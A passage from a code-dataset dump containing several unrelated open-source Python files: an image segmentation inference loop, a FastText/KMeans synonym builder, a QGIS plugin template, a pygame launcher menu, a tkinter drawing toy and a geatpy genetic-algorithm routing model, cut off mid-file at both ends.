np.zeros([batch_size, 224, 224, 3])\nfor img_name_index in range(0, image_number, batch_size):\n if img_name_index + batch_size > image_number:\n batch_size = image_number - img_name_index\n img_batch_store = np.zeros([batch_size, 224, 224, 3])\n for i in range(batch_size):\n img_path_input = path + os.listdir(path)[img_name_index + i]\n img_test = cv2.imread(img_path_input)\n # height,width,channel = img_test.shape\n img_test = cv2.resize(img_test, (224, 224), interpolation=cv2.INTER_CUBIC)\n img_batch_store[i, :, :, :] = img_test\n\n img_test_tensor = tf.convert_to_tensor(img_batch_store, dtype=tf.uint8)\n img_input = tf.reshape(img_test_tensor, [batch_size, 224, 224, 3])\n img_input = tf.cast(img_input, tf.float32)\n img_input = img_input * (1. / 255)\n if img_name_index == 0:\n output = inference(img_input, img_name_index, is_training=False, scope_reuse=False)\n else:\n output = inference(img_input, img_name_index, is_training=False, scope_reuse=True)\n # output = inference(img_input, is_training=True,scope_reuse=True)\n # output =model_enhance_subpixel_BN.transform_net(img_input,size, upscale,scope_reuse=True,is_training=False)\n output = output * 255\n output = tf.reshape(output, [batch_size, 224, 224, 1])\n output = output.eval()\n output[output > 100] = 255\n output[output <= 100] = 0\n\n for j in range(batch_size):\n savepath = write_path + os.listdir(path)[img_name_index + j]\n # output1 = cv2.resize(output[j,:,:,:], (224,224), interpolation=cv2.INTER_CUBIC)\n cv2.imwrite(savepath, output[j, :, :, :])\n","repo_name":"qwerty200696/Tianchi_Competition_2017","sub_path":"code/20171105/Densenet/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"22803296874","text":"from sklearn.cluster import KMeans\nfrom numbers import Number\nfrom pandas import DataFrame\nimport sys, codecs, numpy\nimport pickle\nfrom tqdm import tqdm\nfrom gensim.models import FastText\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\n\nclass autovivify_list(dict):\n '''A pickleable version of collections.defaultdict'''\n def __missing__(self, key):\n '''Given a missing key, set initial value to an empty list'''\n value = self[key] = []\n return value\n\n def __add__(self, x):\n '''Override addition for numeric types when self is empty'''\n if not self and isinstance(x, Number):\n return x\n raise ValueError\n\n def __sub__(self, x):\n '''Also provide subtraction method'''\n if not self and isinstance(x, Number):\n return -1 * x\n raise ValueError\n\ndef build_word_vector_matrix(vector_file, n_words):\n '''Return the vectors and labels for the first n_words in vector file'''\n numpy_arrays = []\n labels_array = []\n with codecs.open(vector_file, 'r', 'utf-8') as f:\n for c, r in enumerate(f):\n sr = r.split()\n labels_array.append(sr[0])\n numpy_arrays.append( numpy.array([float(i) for i in sr[1:]]) )\n\n if c == n_words:\n return numpy.array( numpy_arrays ), labels_array\n\n return numpy.array( numpy_arrays ), labels_array\n\ndef find_word_clusters(labels_array, cluster_labels):\n '''Return the set of words in each cluster'''\n cluster_to_words = autovivify_list()\n for c, i in enumerate(cluster_labels):\n cluster_to_words[ i ].append( labels_array[c] )\n return cluster_to_words\n\nword_list = []\nsentences = []\n\nstop_words = set(stopwords.words('english'))\n\n# filename = sys.argv[1]\n\n# python kmeans.py glove.6B.100d.txt 300 .1\nif __name__ == \"__main__\":\n # with open(\"../sentences.pkl\", \"rb\") as f:\n # sentences = pickle.load(f)\n\n # with open(\"../word_list.pkl\", \"rb\") as f:\n # word_list = pickle.load(f)\n\n with open(\"../data/X.txt\", 'r') as f:\n cnt = 0\n for line in f:\n cnt = cnt + 1\n if cnt%500 == 0:\n print(\"processed: \"+str(cnt)+\" lines!\")\n word_list.extend(nltk.word_tokenize(line))\n word_list = list(set(word_list))\n sublines = line.strip().split('.')\n sublines = [subline.strip().split(' ') for subline in sublines]\n sentences.extend(sublines)\n word_list = [word for word in word_list if word.isalpha()]\n print (\"Punctuations removed...\")\n word_list = [word for word in word_list if not word in stop_words]\n print (\"Stop words removed...\")\n word_list = list(set(word_list))\n print(\"word_list created successfully!\\n\"+str(len(word_list)))\n print(len(sentences))\n\n # using FastText to create embeddings from our dataset\n print(\"creating FastText model!\")\n model = FastText(sentences, size=100, window=5, min_count=5, workers=8,sg=1)\n print(\"FastText model created successfully!\")\n \n numpy_arrays = []\n labels_array = []\n print(\"creating vocabulary clusters...\")\n for word in word_list:\n labels_array.append(word)\n try:\n numpy_arrays.append(model[word])\n except:\n pass\n df = numpy.array(numpy_arrays)\n\n n_words = int(sys.argv[1]) # Number of words to analyze\n reduction_factor = float(sys.argv[2]) # Amount of dimension reduction {0,1}\n n_clusters = int( n_words * reduction_factor ) # Number of clusters to make\n kmeans_model = KMeans(init='k-means++', n_clusters=n_clusters, n_init=10)\n kmeans_model.fit(df)\n\n cluster_labels = kmeans_model.labels_\n cluster_inertia = kmeans_model.inertia_\n cluster_to_words = find_word_clusters(labels_array, cluster_labels)\n\n with open('cluster_to_words.ft.pkl', 'wb') as f:\n pickle.dump(cluster_to_words, f)\n \n print(\"cluster vocabulary created successfully!\")\n\n with open('cluster_to_words.ft.pkl', 'rb') as f:\n clusters = pickle.load(f)\n \n # print(clusters)\n\n# maxlen = 0\nwith open('synonym_sample.kmeans1.ft.syn', 'w+') as f:\n print(\"creating dictionary...\")\n for c in clusters:\n # print((clusters[c]))\n # print(\"\\n\")\n # maxlen = max(maxlen, len(clusters[c]))\n # if maxlen < len(clusters[c]):\n # maxlen = len(clusters[c])\n # maxc = clusters[c]\n \n words = clusters[c]\n root, words = words[0], words[1:]\n \n f.write(root+' '+root+'\\n')\n for i in range(len(words)):\n f.write(words[i]+' '+root+'\\n')\n f.write('indices'+' '+'index*')\n print(\"dictionary created successfully...\")\n\n # print(maxlen)\n # print(maxc)","repo_name":"urmisaha/Semantic_Text_Indexing_With_PostgreSQL","sub_path":"k-means-clustering/kmeans_create_vocab.py","file_name":"kmeans_create_vocab.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"71788540167","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom .resources import *\n\n#メニュー読み込み\nfrom .Sample_Menu_01 import SampleMenu01\nfrom .Sample_Menu_02 import SampleMenu02\n\nimport os\nimport os.path\nimport sys\nimport codecs\n\nQString = str\n\ntry:\n _fromUtf8 = QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\nclass Sample:\n def __init__(self, iface):\n self.iface = iface\n self.canvas = self.iface.mapCanvas()\n\n self.plugin_dir = os.path.dirname(__file__)\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'Sample_{}.qm'.format(locale))\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n if qVersion() > '4.3.3':\n QCoreApplication.installTranslator(self.translator)\n self.actions = []\n self.menu = u'Sample'\n self.toolbar = self.iface.addToolBar(u'Sample')\n self.toolbar.setObjectName(u'Sample')\n\n def tr(self, message):\n return QCoreApplication.translate('Sample', message)\n\n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n if status_tip is not None:\n action.setStatusTip(status_tip)\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n if add_to_toolbar:\n self.toolbar.addAction(action)\n if add_to_menu:\n self.iface.addPluginToMenu(\n self.menu,\n action)\n self.actions.append(action)\n return action\n\n def initGui(self):\n self.win = self.iface.mainWindow()\n icon_path = ':/plugins/Sample/icon.png'\n #メニュー設定\n self.add_action(\n icon_path=None,\n text=u\"Menu01\",\n callback=self.Menu01,\n parent=self.win)\n self.add_action(\n icon_path=None,\n text=u\"Menu02\",\n callback=self.Menu02,\n parent=self.win)\n\n def unload(self):\n for action in self.actions:\n self.iface.removePluginMenu(\n u'Sample',\n action)\n self.iface.removeToolBarIcon(action)\n del self.toolbar\n\n #Menu01メニュークリック\n def Menu01(self):\n #SampleMenu01読み込み\n self.sample_menu_01 = SampleMenu01(self.iface)\n #Menu01クリックでメッセージ表示\n self.sample_menu_01.message_add()\n\n #Menu02メニュークリック\n def Menu02(self):\n #SampleMenu02読み込み\n self.sample_menu_02 = SampleMenu02(self.iface)\n #SampleMenu02Dialog表示\n self.sample_menu_02.dlg.show()\n\n def run(self):\n pass\n","repo_name":"dayjournal/PythonMapAppPlugin","sub_path":"Chapter_04/qgis3plugin-starter/dist/Sample/Sample.py","file_name":"Sample.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"47331943420","text":"# coding=utf-8\n\n# python2 issues, div with float, not int\nfrom __future__ import division\nimport pygame\nimport os\n\ntry:\n from datetime import datetime, timedelta\nexcept:\n import datetime\n\nfrom core.constants import *\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\nhandler = logging.FileHandler(os.path.join(PATH, \"log.txt\"))\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nfrom core.colors import *\nfrom core.component.upbar import UpBar\n\nfrom core.component.squaredmenu import SquaredMenu\nfrom core.component.dialog import Dialog\nfrom core.component.simplenotification import SimpleNotification\nfrom core.component.mainpygame import MainPyGame\nfrom core.section.gogpygame import GOGPygame\nfrom core.section.itchpygame import ItchPygame\nfrom core.section.repositorypygame import RepositoryPygame\nfrom core.section.settingspygame import SettingsPygame\nfrom core.section.quitpygame import QuitPygame\nfrom core.section.wificonfigurationpygame import WifiConfigurationPygame\nfrom core.effect.pixelate import pixelate\n\nclass MenuPygame(MainPyGame, SquaredMenu, GOGPygame, ItchPygame, RepositoryPygame, SettingsPygame, WifiConfigurationPygame, QuitPygame):\n\n def __init__(self):\n # init\n # pygame.init()\n pygame.display.init()\n pygame.font.init()\n\n self.initJoysticks()\n self.loadSettings()\n self.playMusicFromSettings()\n # Create pygame screen and objects\n #self.surface = pygame.display.set_mode(WINDOW_SIZE, pygame.FULLSCREEN)\n self.surface = pygame.display.set_mode(WINDOW_SIZE)\n self.clock = pygame.time.Clock()\n pygame.display.set_caption('Menu principal')\n self.gog = None #TODO check if it could be serialized, stored, restored and synchronized with background process\n self.itch = None\n\n def main(self):\n self.notification = SimpleNotification(surface=self.surface,clock=self.clock,parent=self)\n #show notification for dev revision\n self.notification.showNotification(text='dev revision')\n options = [\n {\n \"title\" : \"Aceptar\"\n }\n ]\n #show alert for configuration\n self.dialog = Dialog(surface=self.surface,title=\"Welcome\",message=\"Please configure before use\",options=options)\n self.dialog.draw()\n\n self.drawMainMenu()\n\n def drawMainMenu(self):\n menus = [\n {\"title\": \"Itch.io (alpha)\", \"image\": \"images/itch.png\", \"action\": self.navigateItch},\n {\"title\": \"GOG (alpha)\", \"image\": \"images/GOG.png\", \"action\": self.navigateGOG},\n {\"title\": \"Wifi Configuration\", \"image\": \"images/wifi.png\", \"action\": self.configWifi},\n {\"title\": \"Remote repository\", \"image\": \"images/cloud.png\", \"action\": self.navigateRepository},\n {\"title\": \"Local\", \"image\": \"images/hdd.png\", \"action\": self.createLocalRepo},\n {\"title\": \"Settings\", \"image\": \"images/settings.png\", \"action\": self.settingsMenu},\n {\"title\": \"Exit\", \"image\": \"images/exit.png\", \"action\": self.quit}\n ]\n self.manageMainEvents(menus)\n\n #used to refresh main menu\n def drawMainMenuComponents(self,menus,selected,visibleOptions):\n # draw components\n #self.drawComponents() # at this moment bars\n self.upbar.drawBackground()\n self.upbar.refresh()\n #self.upbar.menu.draw()\n #self.upbar.drawWidgets()\n\n # clean events, needs to be after drawComponents\n self.changes = False\n\n # now draw menus\n rectangles = self.drawSquaredMenus(menus, selected, visibleOptions)\n\n return rectangles\n\n #used to get widgets updated\n def lastTimeWorker(self):\n if self.lastTime + timedelta(seconds=1) > datetime.now():\n #logger.debug(\"refreshing time at %s \" % datetime.now())\n self.lastTime = datetime.now()\n self.upbar.drawWidgets()\n self.changes = False\n\n def manageMainEvents(self, menus, visibleOptions=4): # TODO\n exit = False\n selected = 0\n self.changes = True\n #build component\n self.upbar = UpBar(surface=self.surface)\n\n # colored background\n self.main_background()\n\n refreshed = False\n\n self.lastTime = datetime.now()\n\n hiddenNotification = None\n pixelateTime = None\n while not exit:\n\n if not pixelateTime:\n pixelate(self.surface,False)\n pixelateTime = True\n\n self.clock.tick(FPS)\n\n if self.changes:\n # clean and put background\n self.main_background()\n\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n\n # clear events\n pygame.event.clear()\n\n if hiddenNotification is not None:\n self.changes = True\n if hiddenNotification + timedelta(seconds=1) > datetime.now():\n #self.notification = None\n pass\n\n if (self.notification is not None and self.notification.active): #TODO\n if (self.notification is not None and self.notification.active):\n hiddenNotification = datetime.now()\n #logger.debug(\"updating when notification is shown... %s\" % hiddenNotification)\n elif hiddenNotification is not None and hiddenNotification+timedelta(seconds=1) > datetime.now():\n if not refreshed:\n self.main_background()\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n refreshed = True\n logger.debug(\"launched one refresh of the components before wait 1 second of last notification was hidden\")\n elif hiddenNotification is not None:\n logger.debug(\"launched final refresh of the components after 1 second of last notification was hidden\")\n hiddenNotification = None\n if self.notification:\n self.main_background()\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n\n self.lastTimeWorker()\n\n # DEBUG: get events and configure\n events = pygame.event.get()\n if len(events) != 0:\n logger.debug(\"mainEvent event %s\" % str(events))\n\n #now manage dialog\n options = None\n if self.dialog is not None and self.dialog.active:\n options = self.dialog.draw(focus=selected)\n else:\n self.dialog = None\n for event in events:\n # normal events\n if event.type == pygame.QUIT:\n exit = True\n elif event.type == pygame.KEYDOWN:\n self.changes = True\n if event.key == pygame.K_ESCAPE:\n pixelate(self.surface,True)\n if self.dialog is not None and self.dialog.active:\n self.dialog.active = False\n selected = 0\n else:\n exit = True\n elif event.key == pygame.K_UP:\n if selected > 0:\n selected -= 1\n elif event.key == pygame.K_DOWN:\n if self.dialog is not None and self.dialog.active:\n # normal part\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.key == pygame.K_LEFT:\n # normal part\n if selected > 0:\n selected -= 1\n elif event.key == pygame.K_RIGHT:\n if self.dialog is not None and self.dialog.active:\n # normal part\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.key == pygame.K_b:\n if self.dialog is not None and self.dialog.active:\n self.dialog.active = False\n selected = 0\n else:\n #normal part\n exit = True\n elif event.key == pygame.K_a or event.key == pygame.K_RETURN:\n if self.dialog is not None and self.dialog.active:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n self.dialog.active = False\n else:\n #normal part\n pixelate(self.surface,True)\n menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n elif event.key == pygame.K_f:\n if self.surface.get_flags() & pygame.FULLSCREEN:\n pygame.display.set_mode(WINDOW_SIZE)\n else:\n pygame.display.set_mode(WINDOW_SIZE, pygame.FULLSCREEN)\n elif event.type == pygame.JOYAXISMOTION:\n self.changes = True\n if event.axis == 1: # up and down\n if event.value > 0:\n if selected < len(menus) - 1:\n selected += 1\n elif event.value < 0:\n if selected > 0:\n selected -= 1\n elif event.axis == 0: # left and right\n if event.value > 0:\n if self.dialog is not None and self.dialog.active:\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.value < 0:\n if selected > 0:\n selected -= 1\n\n elif event.type == pygame.JOYBUTTONDOWN:\n if self.dialog is not None and self.dialog.active:\n if event.button == 1:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n elif event.button == 2:\n selected = 0\n self.dialog.active = False\n else:\n # normal part\n self.changes = True\n if event.button == 1: # button A - enter\n menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n elif event.button == 2: # button B - back\n exit = True\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if self.dialog is not None and self.dialog.active:\n for i in range(0,len(options)):\n option = options[i]\n if option[\"rectangle\"].collidepoint(event.pos):\n selected = i\n else:\n #normal part\n i = 0\n self.changes = True\n for rectangle in rectangles:\n if rectangle.collidepoint(event.pos):\n if visibleOptions > len(menus):\n visibleOptions = len(menus)\n start = 0\n if selected > int(visibleOptions / 2):\n start = int(visibleOptions / 2)\n if start + visibleOptions > len(menus):\n start = len(menus) - visibleOptions\n end = start + visibleOptions\n logger.debug(\"start %s end %s\" % (start, end))\n logger.debug(\"I deduced position %s\" % (start + i))\n selected = (start + i)\n i += 1\n elif event.type == pygame.MOUSEBUTTONUP:\n if self.dialog is not None and self.dialog.active:\n newSelected = -1\n for i in range(0, len(options)):\n option = options[i]\n if option[\"rectangle\"].collidepoint(event.pos):\n newSelected = i\n if newSelected == selected:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n self.dialog.active = False\n self.changes = True\n else:\n # normal part\n i = 0\n for rectangle in rectangles:\n if rectangle.collidepoint(event.pos):\n if visibleOptions > len(menus):\n visibleOptions = len(menus)\n start = 0\n if selected > int(visibleOptions / 2):\n start = int(visibleOptions / 2)\n if start + visibleOptions > len(menus):\n start = len(menus) - visibleOptions\n end = start + visibleOptions\n logger.debug(\"start %s end %s\" % (start, end))\n logger.debug(\"I will launch and select position %s\" % (start + i))\n launch = selected == (start + i)\n selected = (start + i)\n if launch:\n menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n i += 1\n\n pygame.display.flip()\n\n def drawComponents(self):\n self.upbar.draw()\n\n def main_background(self):\n\n if self.on and self.file is not None: # play background music\n self.surface.blit(self.pic, (0, 0))\n else:\n self.surface.fill(COLOR_BACKGROUND)\n","repo_name":"lemoncrest/x-pi-one-launcher","sub_path":"core/section/menupygame.py","file_name":"menupygame.py","file_ext":"py","file_size_in_byte":15414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"15964757448","text":"import tkinter\n\n\ndef f(event):\n c.create_oval((event.x - 10,event.y - 10), (event.x + 10,event.y + 10), fill=color)\n\n\ndef keypress(event):\n global color\n if event.keysym == \"r\":\n color = \"red\"\n if event.keysym == \"g\":\n color = \"green\"\n if event.keysym == \"b\":\n color = \"blue\"\n\n\nw = tkinter.Tk()\ncolor = \"red\"\nc = tkinter.Canvas(width=500, height=500, background=\"white\")\nc.pack()\nc.bind(\"\", f)\nw.bind(\"\", keypress)\nw.mainloop()\n","repo_name":"yandex-lyceum-yakovlev/tkProject2","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37448544670","text":"# -*- coding: utf-8 -*-\nimport geatpy as ea # import geatpy\nimport numpy as np\nimport random\nB=3\nR=6 #此语义下隐含条件 R必须为偶数\nY=1\nS=3\nT=3\nN=Y+S+T\n# 编号规则 稍后补充Dij的自动生成算法\n# 从0开始编号,编号顺序 Y~S~T\nDij=np.array([[0,7,4,9,0,0,0],\n [7,0,0,0,6,7,8],\n [4,0,0,0,10,9,2],\n [9,0,0,0,6,3,7],\n [0,6,10,6,0,0,0],\n [0,7,9,3,0,0,0],\n [0,8,2,7,0,0,0]])\n# d=np.array([[6,7,8],\n# [10,9,2],\n# [6,3,7]])\n# dStart=np.array([7,4,9])\nL=np.array([1,3,3])\nU=np.array([4,4,1])\nNind=50\ncount=1\n\nclass MyProblem(ea.Problem): # 继承Problem父类\n def __init__(self):\n name = 'MyProblem' # 初始化name(函数名称,可以随意设置)\n M = 1 # 初始化M(目标维数)\n maxormins = [1] # 初始化maxormins(目标最小最大化标记列表,1:最小化该目标;-1:最大化该目标)\n # Dim = B*R*S*T # 初始化Dim(决策变量维数)\n Dim = N * N * (B + R) # 初始化Dim(决策变量维数)\n varTypes = [1] * Dim # 初始化varTypes(决策变量的类型,元素为0表示对应的变量是连续的;1表示是离散的)\n lb = [0] * Dim # 决策变量下界\n ub = [2] * Dim# 决策变量上界\n lbin = [1] * Dim # 决策变量下边界(0表示不包含该变量的下边界,1表示包含)\n ubin = [1] * Dim # 决策变量上边界(0表示不包含该变量的上边界,1表示包含)\n # 调用父类构造方法完成实例化\n ea.Problem.__init__(self, name, M, maxormins, Dim, varTypes, lb, ub, lbin, ubin)\n def calReferObjV(self): # 设定目标数参考值(本问题目标函数参考值设定为理论最优值)\n referenceObjV = np.array([[23]])\n return referenceObjV\n\n def aimFunc(self, pop): # 目标函数\n global count\n print(str(count)+\":\",end=\"\")\n count+=1\n\n Yijb = pop.Phen[:,:N*N*B].reshape([Nind, N, N, B]).astype(int) # 得到决策变量矩阵Xijb\n Xijr = pop.Phen[:,N*N*B:].reshape([Nind, N, N, R]).astype(int) # 得到决策变量矩阵Xijr\n l = list(range(Y)) + list(range(Y + S, N))\n\n # 目标函数\n TmaxMin = np.zeros((Nind, B), dtype=np.int) # b # 40*b(40*3)\n for b in range(B):\n for i in range(Y):\n for j in range(Y,Y+S):\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n for i in range(S):\n for j in l:\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n for i in range(N):\n for j in range(Y,Y+S):\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n\n #PPT式1\n CV1=abs(Xijr.sum(axis=3)-Yijb.sum(axis=3)).sum(axis=(1,2)).reshape(Nind,1)\n\n # PPT式2\n preCV2 =np.stack([np.array(L) for _ in range(Nind)], axis=0)\n preCV2[:, :] -= Yijb.sum(axis=(2,3)).reshape(Nind,N)[:,Y:Y+S]\n CV2 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for i in range(S):\n CV2[q] += abs(preCV2[q][i])\n\n\n # PPT式3\n preCV3 =np.stack([np.array(U) for _ in range(Nind)], axis=0)\n preCV3[:, :] -= Yijb.sum(axis=(1,3)).reshape(Nind,N)[:,Y+S:N]\n CV3 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for j in range(T):\n if preCV3[q][j] < 0:\n CV3[q] -= preCV3[q][j]\n\n # PPT式4\n preCV4 =np.stack([np.array(L) for _ in range(Nind)], axis=0)\n preCV4[:, :] -= Xijr.sum(axis=(2,3)).reshape(Nind,N)[:,Y:Y+S]\n CV4 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for i in range(S):\n CV4[q] += abs(preCV4[q][i])\n\n # PPT式5\n preCV5 =np.stack([np.array(U) for _ in range(Nind)], axis=0)\n preCV5[:, :] -= Xijr.sum(axis=(1,3)).reshape(Nind,N)[:,Y+S:N]\n CV5 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for j in range(T):\n if preCV5[q][j] < 0:\n CV5[q] -= preCV5[q][j]\n\n # PPT式6 有问题 待修改\n # CV6 = np.zeros((Nind, 1), dtype=np.int)\n # for n in range(Nind):\n # for r in range(R-1):\n # tmpSum=0\n # for i in range(S):\n # for j in range(T):\n # tmpSum+=Xijr[n][i+Y][j+Y+S][r]-Xijr[n][i+Y][j+Y+S][r+1]\n # if tmpSum<0:\n # CV6[n]-=tmpSum\n\n #纸式1\n CV7 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for r in range(R-1):\n tmpSum=0\n for i in l:\n tmpSum += Xijr[n][i][j + Y][r] - Xijr[n][j + Y][i][r + 1]\n # if tmpSum!=0:\n CV7[n]+=abs(tmpSum)\n\n #纸式2\n CV8 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(T):\n for r in range(R-1):\n tmpSum=0\n for i in range(S):\n tmpSum += Xijr[n][i+Y][j + Y+S][r] - Xijr[n][j + Y+S][i+Y][r + 1]\n if tmpSum<0:\n CV8[n]-=tmpSum\n\n #纸式3\n CV9 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for r in range(R):\n tmpSum=0\n for i in range(S):\n for j in range(T):\n tmpSum+=Xijr[n][i+Y][j+Y+S][r]\n if tmpSum>B:\n CV9[n]+=tmpSum-B\n\n # 纸式4\n CV10 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for b in range(B):\n tmpSum = 0\n for i in range(S):\n for j in range(T):\n tmpSum += Yijb[n][i + Y][j + Y + S][b]\n if tmpSum > R:\n CV10[n] += tmpSum - R\n\n # 纸式5\n CV11 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for i in l:\n CV11[n]+=abs(Xijr[n][i][j+Y][R-1])\n\n # 纸式6\n CV12 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for b in range(B):\n tmpSum=0\n for i in l:\n tmpSum+=Yijb[n][i][j+Y][b]-Yijb[n][j+Y][i][b]\n # if tmpSum!=0:\n CV12+=abs(tmpSum)\n\n # 纸式7\n CV13 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(T):\n for b in range(B):\n tmpSum=0\n for i in range(S):\n tmpSum += Yijb[n][i+Y][j + Y+S][b] - Yijb[n][j + Y+S][i+Y][b]\n if tmpSum<0 or tmpSum>1:\n CV13[n]+=abs(tmpSum)\n\n pop.ObjV = np.max(TmaxMin, axis=1).reshape(Nind, 1) # 计算目标函数值,赋值给pop种群对象的ObjV属性\n pop.CV=np.hstack([CV1,CV2,CV3,CV4,CV5,CV7,CV8,CV9,CV10,CV11,CV12,CV13])\n\n print(pop.CV.sum()//NIND)\n\n\ndef initData():\n L = np.ones(3)\n U = np.zeros(3) #初始化\n while (L.sum() > U.sum()): #防止生成的数据本身无法满足救援条件\n B = random.randint(2, 5)\n R = random.randint(2, 5)\n S = random.randint(2, 5)\n T = random.randint(2, 5)\n d = np.random.randint(1, 11, size=(S, T))\n dStart = np.random.randint(1, 11, size=S)\n L = np.random.randint(1, 6, size=S)\n U = np.random.randint(1, 6, size=T)\n print('本次基因长度为 %d ,随机生成的变量值为:'%(S*T*B*R))\n print(' | S | T | B | R | ')\n print('---------------------------')\n print(\" | \", S, \" | \", T, \" | \", B, \" | \", R, \" | \")\n print('Source 与 Sink 间距离矩阵')\n print(d)\n print('Single Yard 与各个 Source 间距离矩阵')\n print(dStart)\n print('%d 个 Source 的待救援者人数分别为' % S)\n print(L)\n print('%d 个 Sink 的最大容量分别为' % T)\n print(U)\n\nif __name__ == '__main__':\n \"\"\"==============================随机生成原始数据==========================\"\"\"\n # initData()\n \"\"\"===============================实例化问题对象===========================\"\"\"\n problem = MyProblem() # 生成问题对象\n \"\"\"=================================种群设置==============================\"\"\"\n Encoding = 'RI' # 编码方式\n NIND = Nind # 种群规模\n Field = ea.crtfld(Encoding, problem.varTypes, problem.ranges, problem.borders) # 创建区域描述器\n population = ea.Population(Encoding, Field, NIND) # 实例化种群对象(此时种群还没被初始化,仅仅是完成种群对象的实例化)\n \"\"\"===============================算法参数设置=============================\"\"\"\n myAlgorithm = ea.soea_SEGA_templet(problem, population) # 实例化一个算法模板对象\n myAlgorithm.recOper = ea.Xovdp(XOVR=0.9, Parallel=True) # 设置交叉算子\n myAlgorithm.mutOper = ea.Mutinv(Pm=0.05, Parallel=True) # 设置变异算子\n\n # myAlgorithm = ea.soea_DE_rand_1_L_templet(problem, population) # 实例化一个算法模板对象\n # myAlgorithm = ea.soea_DE_currentToBest_1_bin_templet(problem, population) # 实例化一个算法模板对象\n # myAlgorithm.mutOper.F = 0.7 # 差分进化中的参数F\n # myAlgorithm.recOper.XOVR = 0.7 # 重组概率\n\n myAlgorithm.MAXGEN = 200 # 最大进化代数\n myAlgorithm.logTras = 1 # 设置每隔多少代记录日志,若设置成0则表示不记录日志\n myAlgorithm.verbose = True # 设置是否打印输出日志信息\n myAlgorithm.drawing = 1 # 设置绘图方式(0:不绘图;1:绘制结果图;2:绘制目标空间过程动画;3:绘制决策空间过程动画)\n \"\"\"===========================根据先验知识创建先知种群========================\"\"\"\n # prophetChrom = np.zeros([NIND,N * N * (B+R)],dtype=np.int)\n\n tmpProp1=np.zeros([N ,N ,B],dtype=np.int)\n tmpProp1[0][1][0]=tmpProp1[1][4][0]=tmpProp1[4][3][0]=tmpProp1[3][5][0]=tmpProp1[0][2][1]=tmpProp1[2][4][1]=tmpProp1[4][3][1]=tmpProp1[3][5][1]=tmpProp1[0][2][2]=tmpProp1[2][6][2]=tmpProp1[6][2][2]=tmpProp1[2][5][2]=tmpProp1[5][3][2]=tmpProp1[3][5][2]=1\n tmpProp2 = np.zeros([N, N, R], dtype=np.int)\n tmpProp2[0][1][0]=tmpProp2[1][4][1]=tmpProp2[2][4][1]=tmpProp2[2][6][1]=tmpProp2[6][2][2]=tmpProp2[2][5][3]=tmpProp2[5][3][4]=tmpProp2[3][5][5]=1\n tmpProp2[0][2][0]=tmpProp2[4][3][2]=tmpProp2[3][5][3]=2\n tmpProp=np.append(tmpProp1,tmpProp2)\n prophetChrom = np.stack([np.array(tmpProp) for _ in range(Nind)], axis=0)\n\n prophetPop=ea.Population(Encoding, Field, NIND,prophetChrom)\n myAlgorithm.call_aimFunc(prophetPop) # 计算先知种群的目标函数值及约束(假如有约束)\n 